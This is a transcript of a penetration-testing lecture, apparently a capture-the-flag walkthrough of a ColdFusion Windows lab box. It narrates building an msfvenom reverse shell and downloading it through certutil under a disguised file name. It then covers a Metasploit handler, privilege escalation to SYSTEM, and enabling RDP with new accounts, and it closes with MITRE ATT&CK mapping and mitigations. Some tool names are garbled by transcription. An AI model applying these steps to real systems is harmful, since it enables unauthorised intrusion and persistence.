create our executable. Sudo msf venom-h. Control B, hold down Control, press the down arrow a couple times. What we want is, this is Go interpreter all the way. So sudo msf venom payload Control Shift V, right? And what do we want? We want the format to be exe lhost equals 10.10.14.22 output equals 443. Output will be interpreter.exe. Okay, let's just go all the way. Exit. And the reason we're doing this is because nothing else we tried worked. So this is always the last resort. File interpreter. We can see we've got interpreter. And this is for, looks like X386. Now we could have created it specifically for a 64-bit system. So if we go here, Control U. Let's do sudo msf venom list arc. We want to do arcs to list the architecture that is compatible. Invalid option. What did I do wrong? Dash arc value. Dash arc. Okay, and it looks like now it wants the actual output for the platform. So we can do sudo msf venom list platform. Platforms, of course. And we see Windows there, so let's try that. Platform Windows. Incompatible with the payload. So if we do sudo msf venom list payload grep interpreter, and then we want to also search for 64 and Windows. So we're just filtering. We're saying, okay, I want all the payloads only related to interpreter, that have 64 in the name and only related to Windows. And we should probably put reverse in there too. Grep reverse. Okay, let's see here. What do we have? Reverse TCP, this one. Could be promising. And that looks good. Also this one right here. This one is staged, which is more likely to get caught by AV. This one doesn't say it's staged, so let's try this one right here. Copy. Up arrow. Up a couple times. Control left a few times. Let's backspace this out. Space. Space. Control Shift V. Right. Looks pretty good. Let's press enter. Sweet. We got it. So that looks like it'll probably work. Control B, Z, let's zoom out. We're not zoomed in. All right. Now we need to serve this to the user. We can use certutil to download it. So Control B. Let's go back to our shell. Do we have a shell? Looks like we lost it. That's okay. Let's clean things up a little bit. Let's go back and rerun the task. Reran. I'm just going to refresh this to make sure, and it looks like it's still there. That's good. So let's go back here and execute the web request against our shell, and we should get a reverse shell in the top pane. We didn't get anything. Let's try HTTP. All right, we got the shell back. Let's see if we can use certutil to get this. So if we look at the living off the land binaries here, I can use certutil to actually download a file. So this is abusing the legitimate functionality of a legitimate Windows binary for nefarious purposes. That's what living off the land binaries refer to. This project right here, LLBAS. Living off the land binaries and scripts is what it stands for. So let's do it. Certutil, let's make sure we have it. We do. Certutil dash URL cache split, and then let's go ahead and download Interpreter. Let's make sure we can first put the right path in. Okay, good, that is the right path. Let's grab that. Control W to close it, Alt Tab, Control Shift V. I believe that is the right syntax. And then we just need what it's going to be saved as. So let's save it as like Google update.exe. See here, it pulled it down from a web server, successfully saved it, and if you do dir, you can see Google update here. Now we just need to set up our multi-handler. So Control B5 sudo msf db run, and this is going to catch the interpreter shell once we pop the box. So we're on the home stretch, guys. Use multi-handler, show advanced options. Okay, set, let's do show options. Set lhost times 0, set lport. This has to match what we created in the shell. This is what we used right here. Q to go back, set payload, Control Shift V, show options, looking good. And we'll change the exit function to thread instead of process. That way, if the user happens to close the application, it won't just destroy the process, it'll just kill the thread inside of the process, which helps for persistence purposes. So let's go ahead and rerun this. We got the handler set up on the correct IP, on the correct port. Let's close this out. We don't need this one anymore. Control B3, and let's run it. Control B5, and we got a shell. You can see we're running in 64-bit architecture and 64-bit version of Interpreter. We can background this, and we show a session. Now we have the session, so we can run our post-exploitation modules against it. Search suggest. Local exploit suggester is number 4. Use 4. Show options. Set session to the ID here, which is 1. And then just exploit. Let's see what it comes back with. Alright, so we got a few options here. Which one do we use? These are newer exploits. So 16 is the year. And it might be vulnerable to these, but these look a little bit too new. These two might also work, although something was deprecated. Let's go ahead and try this guy right here, just to start. If this doesn't work, we can go down the list, kind of like we did before. Use, Control-Shift-V, paste, enter. Show options. See that L host is set to my ETH adapters, not 10.0, so we need to change that. And exit func should be set to thread. Set session to 1. Shows, let's see, sessions-L. It is 1. Now we should have everything we need. Notice it does work on 2008 exploit targets. Show options again. Let's exploit this puppy. Import 4444, assuming that the firewall allows this out. Here's the moment of truth. Are we system? We are. We successfully escalated our privileges on this box, and I think it was pretty difficult, but we got through it and we made it home. Next thing I like to do is I like to enable the GUI and RDP into the box, and then we will finalize it. Always forget which exact command we use to do this. But git GUI, we can use this to, first of all, enable RDP, and then actually connect to it remotely. So we'll do get GUI-E to enable RDP. Sorry, run git GUI-E. All right, so that pokes the hole through the firewall. Then we can create our account. Git GUI, run git GUI, Bonnie. We should be able to do this since we are a system. Great. Control-B, C. Control-B, comma, our desktop. Let's do X-free desktop. X-free, sorry, RDP, I think is what it's called. Yeah, that's it. So, you can see the usage options here. I believe there's something for auto resizing. Rep size. Now, as you can see, this smart sizing, what it's going to do is it's going to scale the remote desktop window to the appropriate size. So we should have everything we need to connect. Let's try it. Sudo xfree RDP user Bonnie. Let's see, this is the server. And smart sizing. Let's see if that works. Do you trust a birth certificate? Yes, I do. This is Arctic. Just making the window a little bit sized a little bit better. I'm super OCD, so I've got to make this, try to preserve the aspect ratio as much as possible. See, here we are. Here's a server we compromised. Looks like it was in the Athens time zone. And we can see everything we did. It's the directory that we worked out of. Some of the exploits. And we could easily just drag them over now. And look what happens. You'll see actually why some of this stuff didn't work. For example, if I drag this over, it's saying that it's not compatible. When we click Chimichurri, it disappears really fast, so we could just try to figure out what's going on there. can see here it's telling us the appropriate usage. We didn't see this, when we did this from the command shell on our attacker machine, but this is showing here in this interactive window, which I find kind of interesting. Something did happen. I saw this window back here flicker. If we look at the last modified time, of course the problem is we're already system, so let's exit this. Let's go to the control panel. Users, user accounts. And let's look at manage another account. That's right, because I'm not a member of the RDP users group. That is funny. I'm a member of administrators, but I can't add him to the remote desktop user. There we go. Groups. And let's see, do we see Talus? Users. Talus. Member of users. We need to put him in remote desktop. Not there because it's remote desktop users. There we go. Apply, okay. And then log off. Tab. And let's try it again. As Talus. Sweet. Here's the user flag for the capture the flag portion of this. Oh, not that. Control Z. Let's just do it like this. Net use this drive in that path. All right. I have a Z drive. And let's just see if we can run any of this stuff. You see, it just hangs. So, I mean, I just wanted to see if there's another way we can get there through this path, and it doesn't look like it actually works. All right, so that's it for this this privilege escalation technique. If you actually want to look at MITRE to see what we did, go to MITRE. Actually, let's look at MITRE. MITRE attack. The enterprise matrix is what we used. And we gained initial access. not through a drive-by compromise, but a combination of exploiting a public-facing application because of the Metasploit vulnerabilities. The underlying operating system wasn't patched. So that's actually how we escalated our privileges, but we gained initial access through valid accounts. And we used the administrator's hash to get into the operating system, or into the web app. And then we were able to escalate our privileges once we did that. And you can see there's a bunch of different things here that's listed under there, but this is basically how we were able to compromise the application. So the recommended mitigations would be to patch, right? If this server were patched and it weren't running a vulnerable version of Adobe Cold Fusion, then this would make this task significantly harder. And also, I don't even know if antivirus is running. We can check that real quick. I don't see any antivirus. Is it even installed? I think this box is just completely naked. Yeah, there's like nothing here. So it's like somebody just installed it and threw it on the internet. So yeah, antivirus, EDRs, and maybe having like a SOAR, or a security orchestration and automated response tool would also help. But there's nothing on this box, so that's also what led to led to it being compromised. All right, so that's it. In the next lecture, we will talk about privilege escalation, and we will continue to move forward on our next system. All right, see you then.